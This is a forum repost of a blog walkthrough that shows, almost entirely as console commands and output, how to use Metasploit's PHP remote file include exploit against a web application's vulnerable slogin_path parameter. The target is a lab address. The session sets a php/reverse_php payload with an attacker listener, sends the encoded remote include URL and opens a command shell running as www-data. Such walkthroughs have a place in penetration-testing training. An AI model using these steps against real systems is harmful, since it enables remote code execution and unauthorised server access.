设为首页 收藏本站
查看: 719|回复: 0

[经验分享] Using the Metasploit PHP Remote File Include Module-About:Blank H4cking-运维网 博客

[复制链接]

尚未签到

发表于 2018-12-23 07:43:30 | 显示全部楼层 |阅读模式
  
msf > search php_include
  
  • Searching loaded modules for pattern 'php_include'...
      

      
    Exploits
      
    ========
      

      
    Name Rank Description
      
    ---- ---- -----------
      
    unix/webapp/php_include excellent PHP Remote File Include Generic Exploit
      

      
    msf > use exploit/unix/webapp/php_include
      
    msf exploit(php_include) > info
      

      
    Name: PHP Remote File Include Generic Exploit
      
    Version: 8762
      
    Platform: PHP
      
    Privileged: No
      
    License: Metasploit Framework License (BSD)
      
    Rank: Excellent
      

      
    Provided by:
      
    hdm
      
    egypt
      

      
    Available targets:
      
    Id Name
      
    -- ----
      
    0 Automatic
      

      
    Basic options:
      
    Name Current Setting Required Description
      
    ---- --------------- -------- -----------
      
    PATH / yes The base directory to prepend to the URL to try
      
    PHPRFIDB /home/cg/evil/msf3/dev2/data/exploits/php/rfi-locations.dat no A local file containing a list of URLs to try, with XXpathXX replacing the URL
      
    PHPURI no The URI to request, with the include parameter changed to XXpathXX
      
    Proxies no Use a proxy chain
      
    RHOST yes The target address
      
    RPORT 80 yes The target port
      
    SRVHOST 0.0.0.0 yes The local host to listen on.
      
    SRVPORT 8080 yes The local port to listen on.
      
    SSL false no Negotiate SSL for incoming connections
      
    SSLVersion SSL3 no Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
      
    URIPATH no The URI to use for this exploit (default is random)
      
    VHOST no HTTP server virtual host
      

      
    Payload information:
      
    Space: 32768
      

      
    Description:
      
    This module can be used to exploit any generic PHP file include
      
    vulnerability, where the application includes code like the
      
    following:
      

      
    msf exploit(php_include) > set PHPURI /slogin_lib.inc.php?slogin_path=XXpathXX
      
    PHPURI => /slogin_lib.inc.php?slogin_path=XXpathXX
      
    msf exploit(php_include) > set PATH /1/
      
    PATH => /1/
      
    msf exploit(php_include) > set RHOST 192.168.6.68
      
    RHOST => 192.168.6.68
      
    msf exploit(php_include) > set RPORT 8899
      
    RPORT => 8899
      
    msf exploit(php_include) > set PAYLOAD php/reverse_php
      
    PAYLOAD => php/reverse_php
      
    msf exploit(php_include) > set LHOST 192.168.6.140
      
    LHOST => 192.168.6.140
      
    msf exploit(php_include) > exploit
      

      
  • Started bind handler
      
  • Using URL: http://192.168.6.140:8080/RvSIqhdft
      
  • PHP include server started.
      
  • Sending /1/slogin_lib.inc.php?slogin_path=%68%74%74%70%3a%2f%2f%31%39%32%2e%31%36%38%2e%36%2e%31%34%30%3a%38%30
      
    %38%30%2f%52%76%53%49%71%68%64%66%74%3f
      
  • Command shell session 1 opened (192.168.6.140:34117 -> 192.168.6.68:8899) at Sun May 09 21:37:26 -0400 2010
      

      
    dir
      
    0.jpegheader.inc.phplicense.txtslog_users.txt version.txt
      
    1.jpegindex.aspoldslogin.inc.php
      
    adminlog.phpinstall.txtreadme.txtslogin_genpass.php
      
    footer.inc.phplaunch.aspslog_users.phpslogin_lib.inc.php
      

      
    id uid=33(www-data) gid=33(www-data) groups=33(www-data)



  • 运维网声明 1、欢迎大家加入本站运维交流群:群②:261659950 群⑤:202807635 群⑦870801961 群⑧679858003
    2、本站所有主题由该帖子作者发表,该帖子作者与运维网享有帖子相关版权
    3、所有作品的著作权均归原作者享有,请您和我们一样尊重他人的著作权等合法权益。如果您对作品感到满意,请购买正版
    4、禁止制作、复制、发布和传播具有反动、淫秽、色情、暴力、凶杀等内容的信息,一经发现立即删除。若您因此触犯法律,一切后果自负,我们对此不承担任何责任
    5、所有资源均系网友上传或者通过网络收集,我们仅提供一个展示、介绍、观摩学习的平台,我们不对其内容的准确性、可靠性、正当性、安全性、合法性等负责,亦不承担任何法律责任
    6、所有作品仅供您个人学习、研究或欣赏,不得用于商业或者其他用途,否则,一切后果均由您自己承担,我们对此不承担任何法律责任
    7、如涉及侵犯版权等问题,请您及时通知我们,我们将立即采取措施予以解决
    8、联系人Email:admin@iyunv.com 网址:www.yunweiku.com

    所有资源均系网友上传或者通过网络收集,我们仅提供一个展示、介绍、观摩学习的平台,我们不对其承担任何法律责任,如涉及侵犯版权等问题,请您及时通知我们,我们将立即处理,联系人Email:kefu@iyunv.com,QQ:1061981298 本贴地址:https://www.yunweiku.com/thread-654604-1-1.html 上篇帖子: 使用和学习PHP有多难 下篇帖子: PHP线程安全与非线程安全的区别
    您需要登录后才可以回帖 登录 | 立即注册

    本版积分规则

    扫码加入运维网微信交流群X

    扫码加入运维网微信交流群

    扫描二维码加入运维网微信交流群,最新一手资源尽在官方微信交流群!快快加入我们吧...

    扫描微信二维码查看详情

    客服E-mail:kefu@iyunv.com 客服QQ:1061981298


    QQ群⑦:运维网交流群⑦ QQ群⑧:运维网交流群⑧ k8s群:运维网kubernetes交流群


    提醒:禁止发布任何违反国家法律、法规的言论与图片等内容;本站内容均来自个人观点与网络等信息,非本站认同之观点.


    本站大部分资源是网友从网上搜集分享而来,其版权均归原作者及其网站所有,我们尊重他人的合法权益,如有内容侵犯您的合法权益,请及时与我们联系进行核实删除!



    合作伙伴: 青云cloud

    快速回复 返回顶部 返回列表